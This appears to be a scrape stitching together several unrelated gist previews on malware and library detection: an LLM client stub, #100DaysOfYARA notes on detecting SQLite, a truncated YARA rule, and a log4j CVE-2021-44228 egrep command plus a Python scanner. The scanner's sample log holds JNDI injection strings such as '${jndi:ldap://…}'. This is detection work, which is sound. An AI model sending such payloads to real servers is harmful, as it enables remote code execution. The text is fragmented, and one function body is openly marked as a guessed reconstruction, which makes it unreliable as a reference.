from typing import Any, Dict, List, Type
import instructor
from anthropic import Anthropic
from config.settings import get_settings  # project-local settings module, not a PyPI package
from openai import OpenAI
from pydantic import BaseModel, Field


class LLMFactory:
    ...  # class body is cut off in the gist preview
Today for #100DaysOfYARA I want to further explore one of my favorite topics:
"How to reliably detect libraries", or how to identify that a particular program has linked or otherwise included a particular library.
Detecting libraries (especially ones written in C) poses unique challenges compared to detecting malware, including:
- libraries tend to be platform/architecture nonspecific
- compilerisms overwhelm otherwise decent signal
- copy/pasta and groupthink across libraries
Today for #100DaysOfYARA I want to dive into some of the dirty secrets of creating/maintaining code-based YARA signatures.
Let's use SQLite3 as an example. Go get the source here (I prefer the amalgamation):
https://sqlite.org/download.html
I would like to reliably detect when a file is using SQLite. I often look at Windows executables, so I'm going to first concentrate on x86 programs that use this library. The easiest way to find them is to first concentrate on cleartext strings. In this case, I'm gonna pop over to VirusTotal and search for an easily-identifiable string:
content: "failed to allocate %u bytes of memory" type:pe
#!/usr/bin/env python3
import sys, string, struct

def strByByte(_strval):
    strval = bytearray(_strval.encode())
    for s in strval: yield s  # emit the string one byte at a time

def strByDword(_strval):
    strval = bytearray(_strval.encode())
    # rest of the body is cut off in the gist preview; reconstructed here
    # (assumed) to yield the string as little-endian 32-bit values, NUL-padded
    strval += b"\x00" * (-len(strval) % 4)
    for i in range(0, len(strval), 4):
        yield struct.unpack_from("<I", strval, i)[0]
rule general_win_runkey_casing_anomaly : General
{
    meta:
        author = "[email protected]"
        description = "Looks for files containing a reference to the HKCU run key where the reference uses unusual casing."
        date = "2021-08-03"
        hash1 = "c20997c72508bc7340f4ec99fe9eb4f1ccde518e81bda66e7c86632f0748bffa"
        memory_suitable = 0
    strings:
You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all of its subfolders:
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
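The same pattern as the egrep command above, run over a few constructed access-log lines so the matches can be checked programmatically. This is an added example, not part of the original gist; the log lines and TEST-NET hosts are made up for illustration.

```python
#!/usr/bin/env python3
"""Scan log lines for the log4j JNDI lookup pattern used by the egrep command."""
import re
from typing import Iterable, List, Tuple

# Same expression as the egrep: a literal "${" (or its URL-encoded form "%7B")
# followed by "jndi:" and one of the lookup schemes, matched case-insensitively.
JNDI_PATTERN = re.compile(
    r'\$(\{|%7B)jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+',
    re.IGNORECASE,
)

# Constructed sample log (not real traffic); hosts come from the TEST-NET-2 range.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1234 "-" "${jndi:ldap://198.51.100.9:1389/a}"
198.51.100.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=$%7Bjndi:rmi://198.51.100.9:1099/b%7D HTTP/1.1" 404 0
198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 1234 "-" "${JNDI:LDAPS://198.51.100.9/c}"
198.51.100.10 - - [10/Dec/2021:12:00:05 +0000] "GET /jndi-docs HTTP/1.1" 200 99 "-" "curl/7.79"
"""


def find_jndi_attempts(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, matched_text) for every line matching the pattern."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = JNDI_PATTERN.search(line)
        if m:
            # group(2) is the lookup scheme; normalise case for easier triage
            hits.append((lineno, m.group(2).lower(), m.group(0)))
    return hits


def scan_text(text: str) -> List[Tuple[int, str, str]]:
    """Convenience wrapper: split a log blob into lines and scan it."""
    return find_jndi_attempts(text.splitlines())


if __name__ == "__main__":
    for lineno, scheme, matched in scan_text(SAMPLE_LOG):
        print(f"line {lineno}: {scheme} lookup -> {matched}")
```

Note that both the egrep and this scanner only see what is written to disk uncompressed; rotated .gz logs need to be decompressed or searched with a gzip-aware tool.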
/*
Goals for #100DaysofYARA:
  better understanding of bitwise operators
  use math module beyond general entropy of a section / resource
  position specific things beyond what PE module tells us
  do some funky stuff with hashing
*/